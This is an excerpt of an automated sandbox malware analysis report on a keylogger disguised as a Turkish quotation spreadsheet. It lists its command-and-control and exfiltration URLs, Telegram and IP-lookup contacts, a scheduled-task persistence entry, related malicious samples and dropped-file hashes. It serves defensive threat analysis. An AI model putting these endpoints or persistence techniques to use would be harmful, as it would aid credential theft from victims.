https://reallyfreegeoip.org/xml/8.46.123.33$	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000433000.00000040.00000400.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003102000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003129000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003024000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003046000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FDF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092066185.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003041000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000A.00000002.2131580011.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lBcq	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000003151000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4514569706.0000000003092000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4515102020.0000000002FBD000.00000004.00000800.00020000.00000000.sdmp, OnCgVRIhY.exe, 0000000E.00000002.4512207120.0000000000434000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519242
Start date and time:	2024-09-26 08:59:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 175 Number of non-executed functions: 7
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, PID 7360 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
03:00:00	API Interceptor	7431142x Sleep call for process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe modified
03:00:03	API Interceptor	30x Sleep call for process: powershell.exe modified
03:00:04	API Interceptor	5070940x Sleep call for process: OnCgVRIhY.exe modified
09:00:03	Task Scheduler	Run new task: OnCgVRIhY path: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rTEKL__FTALEPVEF__YATTEKL__F__.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPROFORMAINVOICE-PO_ATS_1036pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	MCB_09252024.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PI-96328635,PDF.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Products List.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SWIFT COPY.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.96.3	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	Shipping Documemt.vbs	Get hash	malicious	Lokibot	Browse	werdotx.shop/Devil/PWS/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
api.telegram.org	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Confirmaci#U00f3n de pago_shrunk.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe	Get hash	malicious	MicroClip	Browse	149.154.167.220
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	http://mintlink32.vercel.app/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.99
	https://bostempek.vercel.app/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegram-privatefree.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tes.lavender8639.workers.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://live-prons-sex.pages.dev/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegrambot-resolved.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://tw2-mzd.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://singaporeprivacygroup.vipsg3.my.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.com	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	149.154.167.220
UTMEMUS	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	132.226.247.73
	cargo details.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Teklifformu_Ekinoks LS 1087251 04-00000152.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	rTEKL__FTALEPVEF__YATTEKL__F__.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
CLOUDFLARENETUS	https://qwehikd-asdu.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminishdw-dws.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://qwekorqw-eqo.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://geminiup-uuyc.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://qwoms-dei3.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://saihdqq-yadq.xyz/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://soqmd-gm.top/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://sklqms-dp3.top/	Get hash	malicious	Unknown	Browse	188.114.96.3
	Bristolairport Payroll-Report.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	z84TTREMITTANCEUSD347_432_63.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rLegalOpinionCopy_doc.cmd	Get hash	malicious	VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	https://geminiqwc-sw.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://tiktok1688.cc/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://qwekorqw-eqo.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://qwoms-dei3.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://cmn.pkgu192.vip/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://frt.asan192.vip/	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://tiktokshopxx.top/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://frt.msxd711.vip/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://frt.uzob291.vip/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://hgw.gznk172.vip/	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\OnCgVRIhY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.log

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
MD5:	16AD599332DD2FF94DA0787D71688B62
SHA1:	02F738694B02E84FFE3BAB7DE5709001823C6E40
SHA-256:	452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
SHA-512:	A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aju0ovhc.hm4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bleeyba5.jwl.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cubm45qi.tff.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
